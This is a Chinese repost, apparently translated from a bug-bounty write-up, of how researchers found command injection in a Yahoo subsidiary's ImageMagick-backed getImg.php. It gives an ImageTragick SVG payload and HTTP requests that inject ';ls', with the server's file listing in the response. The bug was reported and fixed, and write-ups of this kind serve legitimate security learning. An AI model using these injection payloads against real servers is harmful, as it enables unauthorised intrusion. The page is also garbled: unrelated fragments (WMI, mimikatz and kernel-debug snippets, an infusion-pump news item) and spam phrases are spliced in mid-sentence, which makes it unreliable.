时刻回到5月20日的那天晚上，在这之前，我花了好几天的时刻研讨了yahoo的Messenger运用，仍然无法搞清它的作业原理，一同烦人的头痛和脖子痛苦又找上了我。因而我决议出去逛逛，找找新的方针。然后我注意到某件十分风趣的工作，那就是名为Sean的某个研讨人员在参加yahoo的Bug奖赏方案时，由于测验行为超出了yahoo的答应边界而被列 brew install hal入黑名单。

回到屋内后，我与老友Thomas（dawgyg）做了一番沟通，我们共同以为可以再研讨一下Sean被列入黑名单之前测验的那个运用。

二、过程1：侦查踩点

---

Sean的方针是被yahoo收买的一些子公司，在他写的那份白皮书中，这些公司所运用的域名包括：

 

1 2 3 4 5 *.mediagroupone.de *.snacktv.de *.vertical-network.de *.ver通过shadow判别出哪些用户现已被不登录了。tical-n.de *.fabalist ***

尽管上面有不少域名，但在Sean的陈述中，首要针对的是SnackTV的内容办理体系。我和Thomas决议重复Sean运用的 *** ，并以SnackTV的www站点为方针，这样做的原因在于Thomas现已在这个站点上花了必定时刻，一同也找到了一些XSS盲打缝隙。这个站点与其他站点有所不同，原因有两点：（1）这是个德国公司，（2）这是为视频 *** 者准备的开发者网站，并不是为一般的yahoo用户准备的。

上图是SnackTV的搜索页面。很明显这是一个视频网站，但用户注册有必要通过办理员的人工检查，因而我们无法直接拜访该网站的上传面板。

合理Thomas正在忙于主动化扫描这个网站时，我花了些时刻来培育与这个运用的感觉（了解某些事物不正常反响的基础一般是可以了解它们的正常反响是什么）。

三、过程二：扫描

---

在发掘这个运用的脆弱性时，我和Thomas都在做的工作就是工作与这个特定运用有关的后台任务。我运用了“subbrute”以及“dirsearch”这两个被迫辨认脚本，意图在于（1）发掘直接缝隙以及（2）勘探或许存在缝隙的内容。了解怎样运用这些东西可以协助浸透测验人员发掘缝隙。

花了很长时刻工作这些东西后，我们收成了很多的输出，但对我们的协助并不大。这些输出信息中大大都都是规范的过错信息，比如拜访“.htpasswd”时呈现的HTTP 403过错、“admin”页面无法直接拜访被重定向到登陆页面等。但是，运用“dirsearch”脚本通过很多关键词列表匹配后，终究我们确实收成了一个脆缺点。

存在问题的文件名为“getImg.php”，该文件坐落“imged”目录中（http://snacktv.de/imged/getImg.php）。通过一番查找，我们发现通过Google搜索“site:snacktv.de filetype:php”能揭露拜访这个文件。这个过程很重要，由于存在缝隙的这个文件需求GET参数才华回来内容。我们或许需求花费数周时刻才华暴力破解或许猜测出正确的GET参数，我猜没有人乐意这么做，由于这些参数一般还需求与别的一个参数协作才华履行正确的查询央求。

GET参数的典型逻辑处理流程如下所示：

1、拜访“http://example.com/supersecretdevblog.php”：回来HTTP 500内部服务器过错，标明我们有必要供给参数才华检查内容。

2、拜访“http://example.com/supersecretdevblog.php?page=index&post=1”：回来HTTP 200照应，标明参数正确，有或许会回来灵敏信息。

目前为止，我们知道的信息包括：

1、“getImage.php”文件需求多个HTTP GET参数，假如我们通过“imgurl”参数供给一个图画的链接地址，那么这个文件就会依据这个地址主动下载一个被修改正的图片。

2、依据Google搜索露出的参数，我们知道这个文件与ImageMagick的裁剪函数有关。

四、过程3：缝隙拜访及逻辑逃逸约束

---

当发掘出这些信息后，我们想到的之一点就是“ImageTragick”缝隙（CVE-2016-3714），我们决议发送几个测验载荷试试。

我和Thomas花了几个小时的时刻，结构包括缝隙载荷的图片文件。缝隙运用的原理就是运用热门图片文件（即包括载荷的图片文件），服务器会运用 “ImageMagick”指令行东西处理这个图片文件，由于这个东西过滤不严厉，导致处理过程中存在恣意指令履行缝隙。但是我们的载荷没有一个成功，这让我们有点心灰意懒。我们置疑他们是否现已针对这种载荷文件打上了补丁。

我们发往服务器的载荷样例如下所示。图片地址运用的是我们的私家域名，将载荷上传到服务器后，我们通过“imageurl”参数获取服务器上的载荷图片。我们的方针是使服务器履行一条恣意指令。请注意其间“xlink:href”所指向的图片地址。

 

1 2 3 4 <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";> <svg width="640px" height="480px" version="1.1" xmlns="http://www.w3.org/2000/svg"; xmlns:xlink= "http://www.w3.org/1999/xlink";> <image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la" x="0"&nb

sp;y="0" height="640px" width="480px"/> </svg>

除了服务器在处理文件所属的URL地址上有点古怪之外，一切都很正常。我们向服务器发送了一些随机的文本文件，服务器回来的数据总是与上一次调用相同。我们仔细阅读了“ImageMagick”相关材料，结合缝隙发表细节，我们发现服务器好像不存在这个缝隙，也有或许服务器没有运用ImageMagick。我们暂缓侵犯这个文件，决议看一下网站是否存在其他缝隙。

大约在清晨3:30时，我们发现了几个存储型跨站脚本缝隙、HTTP 401照应注入缝隙以及常见的办理不妥问题，但这些都不是关键问题。当你在参加bug奖赏方案、特别是对某个子公司进行测验时，这些问题的奖金一般会大幅缩水，由于这些问题的影响十分低。在某些人眼里，拿到打折的奖金仍是可以承受，但对其他人而言这只是在浪费时刻。以被收买的子公司为方针的仅有优点在于，许多人在这些方针上会放松安全警惕性。

从头回到URL地址后，我变得有些烦躁，开端置疑服务器在处理图片文件的详细完结。假如yahoo没有将图片作为一个全体来处理，而是选用将URL注入到XML中的“image xlink:href”的处理 *** 呢，这种 *** 与缝隙PoC中的情况相似。那么我需求测验哪种载荷才华验证我的猜测？

我在浏览器的地址中附加了一个额定的双引号，然后看到了一些风趣的输出信息，如下所示：

央求：

 

1 2 3 4 GET /imged/getImg.php?imageurl=" HTTP/1.1 Host: snacktv.de Connection: close Upgrade-Insecure-Requests: 1

服务器照应：

 

1 2 3 By default, the image format is determined by its magic number. To specify a particular image format, precede the filename with an image format name and a colon (i.e.&nE5A2204F085C07250DA07D71CB4E48769328D7DCbsp;ps:image)... ... or specify the image type as the filename suffix (i.e. image.ps). Specify file as - for standard input or output.

我之所以运用这个央求，是由于在之前的PoC所运用的XML文件中，我们是在URL实体上运用了双引号（或许单引号也可以）。假如我们向服务器发送一个双引号，就可以迫使服务器跳出这个逻辑处理区域，然后获取服务器上写入指令方位的写权限（参阅前文引证的PoC）。

看来服务器确实运用了ImageMagick！在某种程度上，我是否打破了服务器的履行流程呢？这是否就是指令行的输出？我应该接着发送更多央求。

央求：

 

1 2 3 4 GET /imged/getImg.php?imageurl=";ls HTTP/1.1 Host: snacktv.de Connection: close Upgrade-Insecure-Requests: 1

服务器照应：

 

1 2 3 4 5 6 7 8 9 By default, the image format is determined by its magic number. To specify a particular image format, precede the filename with an image format name and a colon (i.e. ps:image)... ... or specify the image type as the filename suffix (i.e. image.ps). Specify file as - for standard input or output. [redacted] [redacted] index.php getImage.php [redacted] [redacted]

我之所以发送上述字符串，就是想逃出之一条指令的逻辑处理规模。在Linux环境中，你可以将分号附加到最开端的指令中，然后再增加第二个指令缝隙演示。这对侵犯者来说十分有用，由于它可以答应侵犯者在预设的内容外履行指令。

此刻我十分振奋，这是我浸透测验生计中之一次搞定指令注入缝隙。在这之前，我以为tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1/systemd 运用引号或许分号来完结指令注入是一种天真的主意，但现在我现已彻底改变了这个观念。

我通过HackerOne的bug奖赏方案向yahoo提交了这个缝隙，不久之后（24小时以内），我就收到了缝隙照应，而且缝隙现已被顺畅修正。

五、总结

---

你是不是还想看过程4？不不不，我们是有工作操行的黑客，要紧记这一点 :-)

搞定SnackTV之后，我意识到不完美的逻辑完结将会带来何种严峻的结果。方针服务器不会遭到通用的ImageTragick缝隙影响，由于它没有遵从规范的格局，而是运用相似的自定义处理格局。假如你在测验中无法确认方针是否存在缝隙，你可以测验换个思路，从本源上查找缝隙侵犯 *** ，考虑缝隙承受什么输入、什么情况下会触发缝隙、你能输入的数据最长可以多长、服务器回来的照应会有什么不同等等。

在yahoo的这种大型运用上花费这么多精力显然是值得的，特别感谢dawgyg在百忙中与我一同测验。

趁便说下，缝隙奖赏为3,000美元，缝隙的CVSS评分为9.9分。

本文转载自 samcurry.net原文链接：http://samcurry.net/how-i-couldve-taken-over-the-production-server-of-a-yahoo-acquisition-through-command-injection/

盗 *** 神器:怎么经过指令注入缝隙搞定yahoo子公司的出产服务器

7、获取其时登录用户不存活的IP192.168.0.106，发现两次ICM

P echo央求，仍未收到106的ICMP照应，则判别为主机不存活。mName = 0x0000025ea4054550 L"CapturedData" 0 }如何通过命令注入漏洞搞定雅虎子公司的生产服务器

盗 *** 神器Get-WMIObject -Namespace rootSubscription -Class __EventFilter -Filter “Name=’Updater’” | Remove-WmiObject -Verbose找到保存的文件并将文件扩展名更改为.ps1。然后右键单击该文件并选择Run with PowerShell。这将发起installer。void l2cu_reject_connection(tL2C_LCB* p_lcb, uint16_t remote_cid,

OperaPortable.exeSPIVKEY 安全研讨人员今朝创造在明尼苏达州特种医疗器械 *** 商 Smiths Medical *** 的 Medfusion 4000 无线打针输液泵中存在八个安全缝隙。这家企业，史密斯医疗可以说是一家誉满天下的医疗装备和东西供货商，它的产品广泛运用在全世界的病院和照顾护理安排中。而打针泵则是医疗装备中保证输液精度时运用的医疗器械，一般在急性重症监护及手术等情况中。第六组通讯录更新SRCS.DOC（真实扩展名.SCR）盗 *** 神器

n VAC2.DLL：存放安全方案预埋，但未在 CS:GO中加载现在让我们来设备git并克隆cookbook库。2.2 典雅抱大腿postgres-# l

复现python和pywin32设备包 （分流下载：http://pan.baidu.com/s/1jHKw0AU 暗码：kuij）Logon Time : 2/17/2017 4:23:28 PM## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )如何通过命令注入漏洞搞定雅虎子公司的生产服务器

盗 *** 神器DbgPrint("[+] Pool Chunk: 0x%pn"， KernelBuffer);Drozer模块入门$ ./extract-files.sh这可以阻遏一部分恶意扩展，但需求用户的协作，即需求用户手动禁用未签名的扩展，无疑这对用户的安全意识以及用户对Fire

fox的了解程度有较高的要求。

在调用SharedPreferences存储时，某种完结 *** 可所以(java代码)：
md5sum /bin/ps >>/etc/md5db
盗 *** 神器
    登陆用户：小明前期准备如何通过命令注入漏洞搞定雅虎子公司的生产服务器
一共有以下几个进程：
2.工作web服务器的一同运用tail –f来列出收到的每一个央求。
这个进程，就是我们把东西放到保险箱里面，只需具有暗码的人，才华翻开保险箱，知道里面到底是什么东西。sadmin scripts list             				
一直以来我们都在谈论多功用打印机（MFP）在企业环境下所带来的风险，以及侵犯者怎样简略的运用其来进行恶意侵犯，比如通过LDAP提取Windows Active Directory的证书或许乱用“扫描文件”和“扫描电子邮件”功用。
本文标题:盗 *** 神器:怎么经过指令注入缝隙搞定yahoo子公司的出产服务器